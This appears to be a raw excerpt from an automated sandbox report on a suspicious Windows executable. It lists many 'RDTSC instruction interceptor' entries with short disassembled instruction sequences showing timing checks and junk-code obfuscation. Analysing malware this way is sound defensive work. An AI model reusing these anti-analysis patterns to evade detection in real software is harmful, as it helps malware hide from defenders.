                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F1AFF second address: 4CF1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007FE6E8F184B8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 movzx edx, ax 0x00000024 lea eax, dword ptr [ebp+12486879h] 0x0000002a js 00007FE6E8F184BCh 0x00000030 mov edi, dword ptr [ebp+122D2CC0h] 0x00000036 mov edx, dword ptr [ebp+122D2DB4h] 0x0000003c push eax 0x0000003d push ecx 0x0000003e push edx 0x0000003f jc 00007FE6E8F184B6h 0x00000045 pop edx 0x00000046 pop ecx 0x00000047 mov dword ptr [esp], eax 0x0000004a mov ecx, 256092ACh 0x0000004f call dword ptr [ebp+122D1E9Ah] 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FE6E8F184BAh 0x0000005c pushad 0x0000005d push ecx 0x0000005e pop ecx 0x0000005f jmp 00007FE6E8F184C8h 0x00000064 jmp 00007FE6E8F184BBh 0x00000069 popad 0x0000006a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2119 second address: 4F215A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 213D3015h 0x00000010 call 00007FE6E8B29089h 0x00000015 pushad 0x00000016 push edx 0x00000017 jmp 00007FE6E8B29094h 0x0000001c pop edx 0x0000001d je 00007FE6E8B2908Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F215A second address: 4F2188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 js 00007FE6E8F184C4h 0x0000000c jmp 00007FE6E8F184BEh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE6E8F184BEh 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2188 second address: 4F2192 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8B2908Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2403 second address: 4F241C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE6E8F184BBh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F241C second address: 4F2438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B29098h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2438 second address: 4F2462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FE6E8F184C6h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2462 second address: 4F2466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2466 second address: 4F246A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F246A second address: 4F2470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F252F second address: 4F2535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2982 second address: 4F2989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2E2B second address: 4F2E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FE6E8F184BFh 0x00000017 popad 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FE6E8F184B8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 lea eax, dword ptr [ebp+12486879h] 0x0000003a or dh, 0000000Ch 0x0000003d pushad 0x0000003e mov dx, ax 0x00000041 cld 0x00000042 popad 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2E8C second address: 4F2E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2E91 second address: 4F2EB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2EB4 second address: 4F2EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2EB8 second address: 4F2EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F2EBE second address: 4CFC72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007FE6E8B29086h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call dword ptr [ebp+122D2318h] 0x00000013 jmp 00007FE6E8B29094h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE6E8B29092h 0x0000001f jg 00007FE6E8B29092h 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 51F9DE second address: 51F9E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 51F9E3 second address: 51F9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 51FC87 second address: 51FC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 51FC8B second address: 51FCBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29093h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FE6E8B2908Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FE6E8B2908Ch 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 51FDF1 second address: 51FDFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 51FDFB second address: 51FE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 51FF7E second address: 51FF8A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE6E8F184B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 51FF8A second address: 51FFA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B29093h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4CFC6E second address: 4CFC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 529023 second address: 52904A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE6E8B2908Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE6E8B2908Dh 0x00000011 ja 00007FE6E8B29086h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52904A second address: 529050 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5291CA second address: 5291D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5291D5 second address: 5291F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE6E8F184C1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5291F2 second address: 5291F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 529471 second address: 529477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 529477 second address: 52947D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5295EA second address: 5295F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5295F2 second address: 5295F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5295F8 second address: 52960B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE6E8F184BEh 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 529A67 second address: 529A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29092h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FE6E8B29093h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 529A98 second address: 529AA2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE6E8F184B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 529AA2 second address: 529AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jnp 00007FE6E8B29086h 0x00000010 pop ecx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 529AB3 second address: 529AD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FE6E8F184B6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007FE6E8F184C1h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52F0BA second address: 52F0CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52F0CF second address: 52F0E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 je 00007FE6E8F184B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52F80E second address: 52F81D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52FAE4 second address: 52FAF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52FAF5 second address: 52FB1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FE6E8B29086h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE6E8B29092h 0x00000013 jp 00007FE6E8B29086h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52FB1B second address: 52FB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52FB1F second address: 52FB2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52FB2E second address: 52FB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE6E8F184B6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52FCEA second address: 52FCFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE6E8B2908Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 530191 second address: 530198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 530198 second address: 5301AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE6E8B2908Dh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5301AF second address: 5301B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5301B3 second address: 5301BD instructions: 0x00000000 rdtsc 0x00000002 js 00007FE6E8B29086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52E97E second address: 52E990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FE6E8F184B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52E990 second address: 52E996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52E996 second address: 52E99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52E99E second address: 52E9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE6E8B2908Ah 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 52E9AD second address: 52E9CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE6E8F184BDh 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 533377 second address: 533381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE6E8B29086h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 533381 second address: 5333A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C5h 0x00000007 jmp 00007FE6E8F184BCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5352B4 second address: 5352BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 53B894 second address: 53B89F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FE6E8F184B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 53BB53 second address: 53BB5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE6E8B29086h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 53BCC7 second address: 53BCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F1BD4 second address: 4F1BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE6E8B2908Ah 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F286C second address: 4F2875 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 53CB0D second address: 53CB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE6E8B29096h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 53CB27 second address: 53CB2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 53CB2B second address: 53CB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 541F6A second address: 541F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jnp 00007FE6E8F184B6h 0x00000010 pop esi 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 541F87 second address: 541F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29092h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5420CE second address: 5420DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007FE6E8F184B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5420DA second address: 5420E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 542539 second address: 54253D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5427B2 second address: 5427C7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE6E8B29086h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FE6E8B29086h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5427C7 second address: 5427CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545B8D second address: 545BB0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE6E8B29086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE6E8B29096h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545BB0 second address: 545BB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54516D second address: 545177 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE6E8B29086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545177 second address: 5451CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FE6E8F184C7h 0x0000000e jmp 00007FE6E8F184BFh 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007FE6E8F184C5h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jc 00007FE6E8F184B6h 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54533C second address: 54535E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29094h 0x00000007 jne 00007FE6E8B29086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545552 second address: 54555E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007FE6E8F184B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54555E second address: 545566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545566 second address: 54558C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE6E8F184B6h 0x00000008 jmp 00007FE6E8F184C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
